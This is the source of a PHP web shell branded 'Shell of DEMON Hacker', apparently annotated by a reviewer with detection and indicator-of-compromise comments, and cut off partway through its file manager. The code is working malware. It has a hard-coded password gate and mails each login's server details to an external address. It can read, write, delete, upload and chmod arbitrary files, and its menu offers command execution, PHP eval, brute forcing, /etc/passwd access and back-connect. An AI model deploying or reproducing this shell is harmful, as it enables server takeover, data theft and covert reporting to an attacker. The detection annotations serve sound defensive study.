1<?php error_reporting(7);
// Bootstrap of a single-file PHP web shell (the menu further down offers "Execute Command",
// "Eval PHP Code" and "Back Connect").
// error_reporting(7) is E_ERROR | E_WARNING | E_PARSE, so notices about undefined variables are hidden.
// NOTE(review): set_magic_quotes_runtime(), get_magic_quotes_gpc(), eregi() and the $str{0} offset
// syntax used below no longer exist in current PHP, so this listing only runs as-is on legacy PHP 5.x hosts.
2@set_magic_quotes_runtime(0);
3ob_start();
// Start time as seconds + microseconds; it is not read again within this excerpt.
4$mtime = explode(' ', microtime());
5$starttime = $mtime[1] + $mtime[0];
// SA_ROOT: directory containing this script, with backslashes turned into "/" and a trailing "/".
6define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)) . '/');
7//define('IS_WIN', strstr(PHP_OS, 'WIN') ? 1 : 0 );
8define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
9define('IS_COM', class_exists('COM') ? 1 : 0);
10define('IS_GPC', get_magic_quotes_gpc());
// IS_PHPINFO is 1 unless "phpinfo" appears in the disable_functions configuration value.
11$dis_func = get_cfg_var('disable_functions');
12define('IS_PHPINFO', (!eregi("phpinfo", $dis_func)) ? 1 : 0);
// Lifts the script execution time limit; @ hides the warning if the call is refused.
13@set_time_limit(0);
// register_globals emulation: every GET/POST parameter whose name does not start with "_" becomes a
// global variable of the same name. Every bare variable read later in the file ($action, $doing,
// $thefile, $password, ...) is therefore supplied by the request.
// Detection note: the `$$_key = $_value` assignment over $_GET/$_POST is a useful static indicator
// when scanning a web root for this kind of script.
// s_array() is defined outside this excerpt; presumably it undoes magic-quotes escaping (confirm).
14foreach (array('_GET', '_POST') as $_request) {
15 foreach ($$_request as $_key => $_value) {
16 if ($_key{0} != '_') {
17 if (IS_GPC) {
18 $_value = s_array($_value);
19 }
20 $$_key = $_value;
21 }
22 }
23}
24/*================= Info Login ================*/
// Access-gate settings for the shell.
// 'check' = true enables the password gate evaluated in the Login section below.
// 'pass' is a hard-coded plaintext secret; the Login section compares it directly with the submitted
// password and with the 'vbapass' cookie. The literal is an indicator of compromise when hunting for
// copies of this file.
// The cookie* keys are presumably read by scookie(), which is defined outside this excerpt (confirm).
25$admin = array();
26$admin['check'] = true;
27$admin['pass'] = 'niemdamme'; // Password login
28$admin['cookiepre'] = '';
29$admin['cookiedomain'] = '';
30$admin['cookiepath'] = '/';
31$admin['cookielife'] = 86400;
32/*===================== End =====================*/
// $charset is not assigned anywhere above; it can only arrive through the GET/POST import loop.
// A Content-Type header is sent only for the four values listed here.
// NOTE(review): the 'latin1' branch sends iso-8859-2, which looks like a mismatch with the name.
33if ($charset == 'utf8') {
34 header("content-Type: text/html; charset=utf-8");
35} elseif ($charset == 'big5') {
36 header("content-Type: text/html; charset=big5");
37} elseif ($charset == 'gbk') {
38 header("content-Type: text/html; charset=gbk");
39} elseif ($charset == 'latin1') {
40 header("content-Type: text/html; charset=iso-8859-2");
41}
// $self: URL path of this script. PHP_SELF can carry client-supplied path info, and the value is
// concatenated into markup further down without escaping.
42$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
43$timestamp = time();
44/*===================== Login =====================*/
// Login / logout handling. $action, $doing and $password come from the request import loop;
// scookie(), p() and loginpage() are defined outside this excerpt.
// Logout: overwrites the 'vbapass' cookie with an empty value and a negative lifetime, then refreshes to $self.
45if ($action == "logout") {
46 scookie('vbapass', '', -86400 * 365);
47 p('<meta http-equiv="refresh" content="0;URL=' . $self . '">');
48 p('<body style="background:#000">');
49 exit;
50}
51if ($admin['check']) {
52 if ($doing == 'login') {
// Loose (==) comparison of the hard-coded password with the submitted value.
53 if ($admin['pass'] == $password) {
// The submitted password itself becomes the cookie value, so the secret is sent in clear with every
// later request. The cookie name 'vbapass' is usable as an indicator in proxy and WAF logs.
54 scookie('vbapass', $password);
// Phone-home on every successful login: the message carries the server name, request URI, client IP
// and time, and goes to the hard-coded external address below with a "shell@<server IP>" sender.
// The shell's location is thereby disclosed to whoever controls that mailbox. Outbound mail from
// the web server with this sender/recipient pattern is a strong detection signal; @ hides mail() failures.
55 $time_shell = "" . date("d/m/Y - H:i:s") . "";
56 $ip_remote = $_SERVER["REMOTE_ADDR"];
57 $from_shellcode = 'shell@' . gethostbyname($_SERVER['SERVER_NAME']) . '';
58 $to_email = 'dimitriuskan@gmail.com';
59 $server_mail = "" . gethostbyname($_SERVER['SERVER_NAME']) . " - " . $_SERVER['HTTP_HOST'] . "";
60 $linkcr = "Link: " . $_SERVER['SERVER_NAME'] . "" . $_SERVER['REQUEST_URI'] . " - IP Excuting: $ip_remote - Time: $time_shell";
61 $header = "From: $from_shellcode\r\nReply-to: $from_shellcode";
62 @mail($to_email, $server_mail, $linkcr, $header);
63 p('<meta http-equiv="refresh" content="2;URL=' . $self . '">');
64 p('<body style="background:#000">
65
66<BR><BR><div align=center><font style="color:#00e400;">Welcome to Shell of DEMON Hacker! - Please wait...<BR><img src=http://i.imgur.com/UwF8H.gif></div>');
67 exit;
68 } else {
// $err_mess is not assigned in this excerpt; if nothing else sets it, the value can come from the
// request and is echoed without escaping (TODO confirm against the rest of the file).
69 echo $err_mess;
70 }
71 }
// Cookie gate: a missing or non-matching 'vbapass' cookie leads to loginpage(); presumably that
// function stops the script (confirm), otherwise execution would continue past the gate.
72 if ($_COOKIE['vbapass']) {
73 if ($_COOKIE['vbapass'] != $admin['pass']) {
74 loginpage();
75 }
76 } else {
77 loginpage();
78 }
79}
80/*===================== Login =====================*/
// Request handlers that run before any HTML is sent; each may emit its own headers and exit.
// $action, $doing, $thefile, $saveasfile, $table, the $db* values and $mysqldlfile are all
// request-supplied through the GET/POST import loop at the top of the file.
// dbconn(), q() and sqldumptable() are defined outside this excerpt.
81$errmsg = '';
82if ($action == 'phpinfo') {
83 if (IS_PHPINFO) {
84 phpinfo();
85 } else {
86 $errmsg = 'phpinfo() function has non-permissible';
87 }
88}
// downfile: streams the file at $thefile to the client. The path is used as given, so anything
// readable by the PHP process can be retrieved; the extension and basename are also written into
// response headers without quoting or filtering.
89if ($doing == 'downfile' && $thefile) {
90 if (!@file_exists($thefile)) {
91 $errmsg = 'The file you want Downloadable was nonexistent';
92 } else {
93 $fileinfo = pathinfo($thefile);
94 header('Content-type: application/x-' . $fileinfo['extension']);
95 header('Content-Disposition: attachment; filename=' . $fileinfo['basename']);
96 header('Content-Length: ' . filesize($thefile));
97 @readfile($thefile);
98 exit;
99 }
100}
// backupmysql without $saveasfile: connects with request-supplied credentials and walks the tables
// named in $table. NOTE(review): mysql_* is the legacy ext/mysql API, removed in PHP 7.
101if ($doing == 'backupmysql' && !$saveasfile) {
102 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
103 $table = array_flip($table);
104 $result = q("SHOW tables");
105 if (!$result) p('<h2>' . mysql_error() . '</h2>');
106 $filename = basename($_SERVER['HTTP_HOST'] . 'sql.gz');
107 header('Content-type: application/unknown');
108 header('Content-Disposition: attachment; filename=' . $filename);
109 $mysqldata = '';
110 while ($currow = mysql_fetch_array($result)) {
111 if (isset($table[$currow[0]])) {
112 $mysqldata.= sqldumptable($currow[0]);
113 }
114 }
115 mysql_close();
116 exit;
117}
// mysqldown: reads a server-side file through the database server rather than PHP's file API.
// The first attempt is load_file(); the fallback loads the file into a scratch table and selects it
// back. $mysqldlfile is interpolated into the first query unescaped and passed through
// addslashes() only in the second.
// Detection/mitigation: the scratch table name tmp_angel and the "__angel_<timestamp>_eof__"
// terminators stand out in MySQL general/audit logs; an application DB account without the FILE
// privilege and a server with local_infile disabled should close off both routes.
118if ($doing == 'mysqldown') {
119 if (!$dbname) {
120 $errmsg = 'Please input dbname';
121 } else {
122 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
123 if (!file_exists($mysqldlfile)) {
124 $errmsg = 'The file you want Downloadable was nonexistent';
125 } else {
126 $result = q("select load_file('$mysqldlfile');");
127 if (!$result) {
128 q("DROP TABLE IF EXISTS tmp_angel;");
129 q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
130 q("LOAD DATA LOCAL INFILE '" . addslashes($mysqldlfile) . "' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
131 $result = q("select content from tmp_angel");
132 q("DROP TABLE tmp_angel");
133 }
134 $row = @mysql_fetch_array($result);
135 if (!$row) {
136 $errmsg = 'Load file failed ' . mysql_error();
137 } else {
138 $fileinfo = pathinfo($mysqldlfile);
139 header('Content-type: application/x-' . $fileinfo['extension']);
140 header('Content-Disposition: attachment; filename=' . $fileinfo['basename']);
141 header("Accept-Length: " . strlen($row[0]));
142 echo $row[0];
143 exit;
144 }
145 }
146 }
147}
148?>
149
150<html>
151
152<head>
153
154<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
155<link rel="icon" href="http://i568.photobucket.com/albums/ss123/wolftg/skull-1.gif" type="image/x-icon">
156<title><?php echo str_replace('.', '', '.Hacker DEMON Anonymous VN..'); ?></title>
157
158<style type="text/css">
159
160body,td{font: 10pt Tahoma;color:#f4f4f4;line-height: 16px;}
161
162
163img {outline:none;}
164a {color: #00e400;text-decoration:none;}
165
166a:hover{color: #f00;text-decoration:underline;}
167
168.alt1 td{border:none; padding:15px 15px 0px 15px;}
169
170.alt2 td{border-top:1px solid gray;border-bottom:1px solid gray;background:#f9f9f9;padding:5px 10px 5px 5px;}
171
172.focus td{border-top:1px solid gray;border-bottom:0px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
173
174.fout1 td{border-top:1px solid gray;border-bottom:0px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
175
176.fout td{border-top:1px solid gray;border-bottom:0px solid gray;background:#000;padding:5px 10px 5px 5px;}
177
178.head td{border-top:1px solid #00e400;border-bottom:1px solid #00e400;background:#000;padding:5px 10px 5px 5px;font-weight:bold;}
179
180.head_small td{background:#000;}
181
182.head td span{font-weight:normal;}
183
184form{margin:0;padding:0;}
185
186h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
187
188ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
189
190u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
191
192input, textarea, button
193{
194 font-size: 9pt;
195 color: #ccc;
196 font-family: verdana, sans-serif;
197 background: #000;
198 border: 1px solid #00e400;
199
200}
201select
202
203{
204
205 font-size: 8pt;
206
207 font-weight: normal;
208
209 color: #ccc;
210
211 font-family: verdana, sans-serif;
212
213 background-color: #000;
214
215}
216
217
218
219</style>
220
221<script type="text/javascript">
222
// Copies the state of the form's "chkall" checkbox onto every other element of that form.
// The file list's select-all box calls this with its own form.
223function CheckAll(form) {
224
225 for(var i=0;i<form.elements.length;i++) {
226
227 var e = form.elements[i];
228
229 if (e.name != 'chkall')
230
231 e.checked = form.chkall.checked;
232
233 }
234
235}
236
// Shorthand for document.getElementById; every other helper on the page uses it to reach a form.
237function $(id) {
238
239 return document.getElementById(id);
240
241}
242
// Writes `act` into the "action" field of the form with id "goaction" and submits it.
// The menu links call this, so the posted "action" value selects which module the PHP side runs;
// the parameter name and its values (file, sqladmin, shell, eval, ...) are usable as request-log indicators.
243function goaction(act){
244
245 $('goaction').action.value=act;
246
247 $('goaction').submit();
248
249}
250
251</script>
252
253</head>
254
255<body onLoad="init()" style="margin:0;table-layout:fixed; word-break:break-all" bgcolor=black style="background:#000">
256
257
258
259
260
261<div border="0" style="position:fixed; width: 100%; height: 25px; z-index: 1; top: 300px; left: 0;" id="loading" align="center" valign="center">
262
263 <table border="1" width="110px" cellspacing="0" cellpadding="0" style="border-collapse: collapse" bordercolor="#003300">
264
265 <tr>
266
267 <td align="center" valign=center>
268
269 <div border="1" style="background-color: #0E0E0E; filter: alpha(opacity=70); opacity: .7; width: 110px; height: 25px; z-index: 1; border-collapse: collapse;" bordercolor="#006600" align="center">
270
271 Loading<img src="http://i382.photobucket.com/albums/oo263/vnhacker/loading.gif">
272
273 </div>
274
275 </td>
276
277 </tr>
278
279 </table>
280
281</div>
282
283 <script>
284
// Legacy browser sniffing (document.layers / document.all) used to locate the "loading" overlay,
// plus init(), which the body's onLoad handler calls to hide that overlay once the page has loaded.
285 var ld=(document.all);
286
287 var ns4=document.layers;
288
289 var ns6=document.getElementById&&!document.all;
290
291 var ie4=document.all;
292
293 if (ns4)
294
295 ld=document.loading;
296
297 else if (ns6)
298
299 ld=document.getElementById("loading").style;
300
301 else if (ie4)
302
303 ld=document.all.loading.style;
304
// Hides the overlay: `visibility` for the document.layers case, `display` for the other two.
305 function init()
306
307 {
308
309 if(ns4){ld.visibility="hidden";}
310
311 else if (ns6||ie4) ld.display="none";
312
313 }
314
315 </script>
316
317
318
319
320
321
322
323
324
325<table width="100%" border="0" cellpadding="0" cellspacing="0">
326
327 <tr class="head_small">
328
329 <td width=100%>
330
331 <table width=100%><tr class="head_small"><td width="150px"><a href="<?php $self; ?>"><img src="http://pixaroma.com/wp-content/uploads/2016/02/Free-Hacker-Digital-Vector-Skull.png" width="195" height=240 border=0></a></td>
332
333 <td>
334
335 <span style="float:left;"> <?php echo "Hostname: " . $_SERVER['HTTP_HOST'] . ""; ?> | <a href="javascript:goaction('logout');"><font color=red>Logout</font></a></span></br>
336
337
338
339 <?php
// Host fingerprint banner: prints which database/cURL extensions are callable, the PHP version,
// the disable_functions list, uname output and the script's uid/gid/owner. All values are echoed
// into the page without escaping.
// $safe_mode and $SERVER_SOFTWARE are not assigned in this excerpt; they are set only if the
// request supplies them or if something outside this excerpt defines them (confirm).
340$curl_on = @function_exists('curl_version');
341$mysql_on = @function_exists('mysql_connect');
342$mssql_on = @function_exists('mssql_connect');
343$pg_on = @function_exists('pg_connect');
344$ora_on = @function_exists('ocilogon');
345echo (($safe_mode) ? ("Safe_mod: <b><font color=green>ON</font></b> - ") : ("Safe_mod: <b><font color=red>OFF</font></b> - "));
346echo "PHP version: <b>" . @phpversion() . "</b> - ";
347echo "cURL: " . (($curl_on) ? ("<b><font color=green>ON</font></b> - ") : ("<b><font color=red>OFF</font></b> - "));
// Each *_on flag below is recomputed although it was already set above.
348echo "MySQL: <b>";
349$mysql_on = @function_exists('mysql_connect');
350if ($mysql_on) {
351 echo "<font color=green>ON</font></b> - ";
352} else {
353 echo "<font color=red>OFF</font></b> - ";
354}
355echo "MSSQL: <b>";
356$mssql_on = @function_exists('mssql_connect');
357if ($mssql_on) {
358 echo "<font color=green>ON</font></b> - ";
359} else {
360 echo "<font color=red>OFF</font></b> - ";
361}
362echo "PostgreSQL: <b>";
363$pg_on = @function_exists('pg_connect');
364if ($pg_on) {
365 echo "<font color=green>ON</font></b> - ";
366} else {
367 echo "<font color=red>OFF</font></b> - ";
368}
369echo "Oracle: <b>";
370$ora_on = @function_exists('ocilogon');
371if ($ora_on) {
372 echo "<font color=green>ON</font></b>";
373} else {
374 echo "<font color=red>OFF</font></b><BR>";
375}
// Shows the runtime disable_functions value; an empty list is reported as NONE.
376echo "Disable functions : <b>";
377if ('' == ($df = @ini_get('disable_functions'))) {
378 echo "<font color=green>NONE</font></b><BR>";
379} else {
380 echo "<font color=red>$df</font></b><BR>";
381}
// uname and server strings are truncated to 120 characters.
382echo "<font color=white>Uname -a</font>: " . @substr(@php_uname(), 0, 120) . "<br>";
383echo "<font color=white>Server</font>: " . @substr($SERVER_SOFTWARE, 0, 120) . " - <font color=white>id</font>: " . @getmyuid() . "(" . @get_current_user() . ") - uid=" . @getmyuid() . " (" . @get_current_user() . ") gid=" . @getmygid() . "(" . @get_current_user() . ")<br>";
384?> </td>
385
386 </tr></table></td>
387
388 </tr>
389
390 <tr class="alt1">
391
392 <td width=100%><span style="float:left;">[Server IP: <?php echo "<font color='#00e400'>" . gethostbyname($_SERVER['SERVER_NAME']) . "</font>"; ?> - Your IP: <?php echo "<font color='#00e400'>" . $_SERVER['REMOTE_ADDR'] . "</font>"; ?>] </span><br />
393<center>------------------------------------------------------------------------------------------</center><br />
394
395
396
397 <a href="javascript:goaction('file');">File Manager</a> |
398
399 <a href="javascript:goaction('sqladmin');">MySQL Manager</a> |
400
401 <a href="javascript:goaction('sqlfile');">MySQL Upload & Download</a> |
402
403 <a href="javascript:goaction('shell');">Execute Command</a> |
404
405 <a href="javascript:goaction('phpenv');">PHP Variable</a> |
406
407 <a href="javascript:goaction('eval');">Eval PHP Code</a>
408
409 <?php if (!IS_WIN) { ?> | <a href="javascript:goaction('brute');">Brute</a> <?php
410} ?>
411
412 <?php if (!IS_WIN) { ?> | <a href="javascript:goaction('etcpwd');">/etc/passwd</a> <?php
413} ?>
414
415 <?php if (!IS_WIN) { ?> | <a href="javascript:goaction('backconnect');">Back Connect</a><?php
416} ?>
417
418 </td>
419
420 </tr>
421
422</table>
423
424<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
425
426<?php
// Emits the hidden "goaction" form that the menu links submit, shows any pending error message, and
// resolves the working directory. formhead(), makehide(), formfoot(), m(), getPath() and ue() are
// defined outside this excerpt.
427formhead(array('name' => 'goaction'));
428makehide('action');
429formfoot();
430$errmsg && m($errmsg);
// $dir is request-supplied and defaults to the script's own directory; nothing here confines it to
// a base path, so the file manager below operates on whatever location the request names.
431!$dir && $dir = '.';
432$nowpath = getPath(SA_ROOT, $dir);
433if (substr($dir, -1) != '/') {
434 $dir = $dir . '/';
435}
436$uedir = ue($dir);
437if (!$action || $action == 'file') {
438 $dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';
439 if ($doing == 'deldir' && $thefile) {
440 if (!file_exists($thefile)) {
441 m($thefile . ' directory does not exist');
442 } else {
443 m('Directory delete ' . (deltree($thefile) ? basename($thefile) . ' success' : 'failed'));
444 }
445 } elseif ($newdirname) {
446 $mkdirs = $nowpath . $newdirname;
447 if (file_exists($mkdirs)) {
448 m('Directory has already existed');
449 } else {
450 m('Directory created ' . (@mkdir($mkdirs, 0755) ? 'success' : 'failed'));
451 @chmod($mkdirs, 0755);
452 }
453 } elseif ($doupfile) {
454 m('File upload ' . (@copy($_FILES['uploadfile']['tmp_name'], $uploaddir . '/' . $_FILES['uploadfile']['name']) ? 'success' : 'failed'));
455 } elseif ($editfilename && $filecontent) {
456 $fp = @fopen($editfilename, 'w');
457 m('Save file ' . (@fwrite($fp, $filecontent) ? 'success' : 'failed'));
458 @fclose($fp);
459 } elseif ($pfile && $newperm) {
460 if (!file_exists($pfile)) {
461 m('The original file does not exist');
462 } else {
463 $newperm = base_convert($newperm, 8, 10);
464 m('Modify file attributes ' . (@chmod($pfile, $newperm) ? 'success' : 'failed'));
465 }
466 } elseif ($oldname && $newfilename) {
467 $nname = $nowpath . $newfilename;
468 if (file_exists($nname) || !file_exists($oldname)) {
469 m($nname . ' has already existed or original file does not exist');
470 } else {
471 m(basename($oldname) . ' renamed ' . basename($nname) . (@rename($oldname, $nname) ? ' success' : 'failed'));
472 }
473 } elseif ($sname && $tofile) {
474 if (file_exists($tofile) || !file_exists($sname)) {
475 m('The goal file has already existed or original file does not exist');
476 } else {
477 m(basename($tofile) . ' copied ' . (@copy($sname, $tofile) ? basename($tofile) . ' success' : 'failed'));
478 }
479 } elseif ($curfile && $tarfile) {
480 if (!@file_exists($curfile) || !@file_exists($tarfile)) {
481 m('The goal file has already existed or original file does not exist');
482 } else {
483 $time = @filemtime($tarfile);
484 m('Modify file the last modified ' . (@touch($curfile, $time, $time) ? 'success' : 'failed'));
485 }
486 } elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
487 if (!@file_exists($curfile)) {
488 m(basename($curfile) . ' does not exist');
489 } else {
490 $time = strtotime("$year-$month-$day $hour:$minute:$second");
491 m('Modify file the last modified ' . (@touch($curfile, $time, $time) ? 'success' : 'failed'));
492 }
493 } elseif ($doing == 'downrar') {
494 if ($dl) {
495 $dfiles = '';
496 foreach ($dl as $filepath => $value) {
497 $dfiles.= $filepath . ',';
498 }
499 $dfiles = substr($dfiles, 0, strlen($dfiles) - 1);
500 $dl = explode(',', $dfiles);
501 $zip = new PHPZip($dl);
502 $code = $zip->out;
503 header('Content-type: application/octet-stream');
504 header('Accept-Ranges: bytes');
505 header('Accept-Length: ' . strlen($code));
506 header('Content-Disposition: attachment;filename=' . $_SERVER['HTTP_HOST'] . 'sql.gz');
507 echo $code;
508 exit;
509 } else {
510 m('Please select file(s)');
511 }
512 } elseif ($doing == 'delfiles') {
513 if ($dl) {
514 $dfiles = '';
515 $succ = $fail = 0;
516 foreach ($dl as $filepath => $value) {
517 if (@unlink($filepath)) {
518 $succ++;
519 } else {
520 $fail++;
521 }
522 }
523 m('Deleted file have finished??choose ' . count($dl) . ' success ' . $succ . ' fail ' . $fail);
524 } else {
525 m('Please select file(s)');
526 }
527 }
528 formhead(array('name' => 'createdir'));
529 makehide('newdirname');
530 makehide('dir', $nowpath);
531 formfoot();
532 formhead(array('name' => 'fileperm'));
533 makehide('newperm');
534 makehide('pfile');
535 makehide('dir', $nowpath);
536 formfoot();
537 formhead(array('name' => 'copyfile'));
538 makehide('sname');
539 makehide('tofile');
540 makehide('dir', $nowpath);
541 formfoot();
542 formhead(array('name' => 'rename'));
543 makehide('oldname');
544 makehide('newfilename');
545 makehide('dir', $nowpath);
546 formfoot();
547 formhead(array('name' => 'fileopform'));
548 makehide('action');
549 makehide('opfile');
550 makehide('dir');
551 formfoot();
552 $free = @disk_free_space($nowpath);
553 !$free && $free = 0;
554 $all = @disk_total_space($nowpath);
555 !$all && $all = 0;
556 $used = $all - $free;
557 $used_percent = @round(100 / ($all / $free), 2);
558 p('<font color=yellow face=tahoma size=2><B>File Manager</b> </font> Current disk free <font color=red>' . sizecount($free) . '</font> of <font color=red>' . sizecount($all) . '</font> (<font color=red>' . $used_percent . '</font>%)</font>');
559?>
560
561<table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
562
563 <form action="" method="post" id="godir" name="godir">
564
565 <tr>
566
567 <td nowrap>Current Directory (<?php echo $dir_writeable; ?>, <?php echo getChmod($nowpath); ?>)</td>
568
569 <td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath; ?>" type="text" style="width:100%;margin:0 8px;"></td>
570
571 <td nowrap><input class="bt" value="GO" type="submit"></td>
572
573 </tr>
574
575 </form>
576
577</table>
578
579<script type="text/javascript">
580
// Prompts for a directory name and submits it as "newdirname" through the hidden "createdir" form.
// Does nothing when the prompt is cancelled or left empty.
581function createdir(){
582
583 var newdirname;
584
585 newdirname = prompt('Please input the directory name:', '');
586
587 if (!newdirname) return;
588
589 $('createdir').newdirname.value=newdirname;
590
591 $('createdir').submit();
592
593}
594
// Prompts for a new permission value for `pfile` and submits both as "newperm" and "pfile"
// through the hidden "fileperm" form. The server side treats newperm as an octal string.
595function fileperm(pfile){
596
597 var newperm;
598
599 newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', '');
600
601 if (!newperm) return;
602
603 $('fileperm').newperm.value=newperm;
604
605 $('fileperm').pfile.value=pfile;
606
607 $('fileperm').submit();
608
609}
610
// Prompts for a destination path and submits it with the source path as "tofile" and "sname"
// through the hidden "copyfile" form.
611function copyfile(sname){
612
613 var tofile;
614
615 tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', '');
616
617 if (!tofile) return;
618
619 $('copyfile').tofile.value=tofile;
620
621 $('copyfile').sname.value=sname;
622
623 $('copyfile').submit();
624
625}
626
// Prompts for a new file name and submits it with the current path as "newfilename" and "oldname"
// through the hidden "rename" form.
627function rename(oldname){
628
629 var newfilename;
630
631 newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', '');
632
633 if (!newfilename) return;
634
635 $('rename').newfilename.value=newfilename;
636
637 $('rename').oldname.value=oldname;
638
639 $('rename').submit();
640
641}
642
// Submits the "filelist" form with the given "doing" verb (downfile, deldir, downrar, delfiles)
// and, when provided, the target path in "thefile". If a message `m` is passed, the user must
// confirm it first. These field names and verbs appear in the POST body and can serve as indicators.
643function dofile(doing,thefile,m){
644
645 if (m && !confirm(m)) {
646
647 return;
648
649 }
650
651 $('filelist').doing.value=doing;
652
653 if (thefile){
654
655 $('filelist').thefile.value=thefile;
656
657 }
658
659 $('filelist').submit();
660
661}
662
// Prompts for a file name and opens the 'editfile' action on nowpath + filename via opfile().
663function createfile(nowpath){
664
665 var filename;
666
667 filename = prompt('Please input the file name:', '');
668
669 if (!filename) return;
670
671 opfile('editfile',nowpath + filename,nowpath);
672
673}
674
// Fills the hidden "fileopform" form with the requested action, the target file ("opfile") and the
// current directory ("dir"), then submits it.
675function opfile(action,opfile,dir){
676
677 $('fileopform').action.value=action;
678
679 $('fileopform').opfile.value=opfile;
680
681 $('fileopform').dir.value=dir;
682
683 $('fileopform').submit();
684
685}
686
// Navigates the file manager: sets "dir" on the "godir" form (and "view_writable" to 1 when the
// second argument is truthy) and submits it.
687function godir(dir,view_writable){
688
689 if (view_writable) {
690
691 $('godir').view_writable.value=1;
692
693 }
694
695 $('godir').dir.value=dir;
696
697 $('godir').submit();
698
699}
700
701</script>
702
703 <?php
704 tbhead();
705 p('<form action="' . $self . '" method="POST" enctype="multipart/form-data"><tr class="alt1"><td colspan="7" style="padding:5px;">');
706 p('<div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="' . $dir . '" type="hidden" /><input name="dir" value="' . $dir . '" type="hidden" /></div>');
707 p('<a href="javascript:godir(\'' . $_SERVER["DOCUMENT_ROOT"] . '\');">WebRoot</a>');
708 if ($view_writable) {
709 p(' | <a href="javascript:godir(\'' . $nowpath . '\');">View All</a>');
710 } else {
711 p(' | <a href="javascript:godir(\'' . $nowpath . '\',\'1\');">View Writable</a>');
712 }
713 p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\'' . $nowpath . '\');">Create File</a>');
714 if (IS_WIN && IS_COM) {
715 $obj = new COM('scripting.filesystemobject');
716 if ($obj && is_object($obj)) {
717 $DriveTypeDB = array(0 => 'Unknow', 1 => 'Removable', 2 => 'Fixed', 3 => 'Network', 4 => 'CDRom', 5 => 'RAM Disk');
718 foreach ($obj->Drives as $drive) {
719 if ($drive->DriveType == 2) {
720 p(' | <a href="javascript:godir(\'' . $drive->Path . '/\');" title="Size:' . sizecount($drive->TotalSize) . ' Free:' . sizecount($drive->FreeSpace) . ' Type:' . $DriveTypeDB[$drive->DriveType] . '">' . $DriveTypeDB[$drive->DriveType] . '(' . $drive->Path . ')</a>');
721 } else {
722 p(' | <a href="javascript:godir(\'' . $drive->Path . '/\');" title="Type:' . $DriveTypeDB[$drive->DriveType] . '">' . $DriveTypeDB[$drive->DriveType] . '(' . $drive->Path . ')</a>');
723 }
724 }
725 }
726 }
727 p('</td></tr></form>');
728 p('<tr class="head"><td> </td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
729 $dirdata = array();
730 $filedata = array();
731 if ($view_writable) {
732 $dirdata = GetList($nowpath);
733 } else {
734 $dirs = @opendir($dir);
735 while ($file = @readdir($dirs)) {
736 $filepath = $nowpath . $file;
737 if (@is_dir($filepath)) {
738 $dirdb['filename'] = $file;
739 $dirdb['mtime'] = @date('Y-m-d H:i:s', filemtime($filepath));
740 $dirdb['dirchmod'] = getChmod($filepath);
741 $dirdb['dirperm'] = getPerms($filepath);
742 $dirdb['fileowner'] = getUser($filepath);
743 $dirdb['dirlink'] = $nowpath;
744 $dirdb['server_link'] = $filepath;
745 $dirdb['client_link'] = ue($filepath);
746 $dirdata[] = $dirdb;
747 } else {
748 $filedb['filename'] = $file;
749 $filedb['size'] = sizecount(@filesize($filepath));
750 $filedb['mtime'] = @date('Y-m-d H:i:s', filemtime($filepath));
751 $filedb['filechmod'] = getChmod($filepath);
752 $filedb['fileperm'] = getPerms($filepath);
753 $filedb['fileowner'] = getUser($filepath);
754 $filedb['dirlink'] = $nowpath;
755 $filedb['server_link'] = $filepath;
756 $filedb['client_link'] = ue($filepath);
757 $filedata[] = $filedb;
758 }
759 }
760 unset($dirdb);
761 unset($filedb);
762 @closedir($dirs);
763 }
764 @sort($dirdata);
765 @sort($filedata);
766 $dir_i = '0';
767 foreach ($dirdata as $key => $dirdb) {
768 if ($dirdb['filename'] != '..' && $dirdb['filename'] != '.') {
769 $thisbg = bg();
770 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
771 p('<td width="2%" nowrap><font face="wingdings" size="3">0</font></td>');
772 p('<td><a href="javascript:godir(\'' . $dirdb['server_link'] . '\');">' . $dirdb['filename'] . '</a></td>');
773 p('<td nowrap>' . $dirdb['mtime'] . '</td>');
774 p('<td nowrap>--</td>');
775 p('<td nowrap>');
776 p('<a href="javascript:fileperm(\'' . $dirdb['server_link'] . '\');">' . $dirdb['dirchmod'] . '</a> / ');
777 p('<a href="javascript:fileperm(\'' . $dirdb['server_link'] . '\');">' . $dirdb['dirperm'] . '</a>' . $dirdb['fileowner'] . '</td>');
778 p('<td nowrap><a href="javascript:dofile(\'deldir\',\'' . $dirdb['server_link'] . '\',\'Are you sure will delete ' . $dirdb['filename'] . '? \\n\\nIf non-empty directory, will be delete all the files.\')">Del</a> | <a href="javascript:rename(\'' . $dirdb['server_link'] . '\');">Rename</a></td>');
779 p('</tr>');
780 $dir_i++;
781 } else {
782 if ($dirdb['filename'] == '..') {
783 p('<tr class=fout>');
784 p('<td align="center"><font face="Wingdings 3" size=4>=</font></td><td nowrap colspan="5"><a href="javascript:godir(\'' . getUpPath($nowpath) . '\');">Parent Directory</a></td>');
785 p('</tr>');
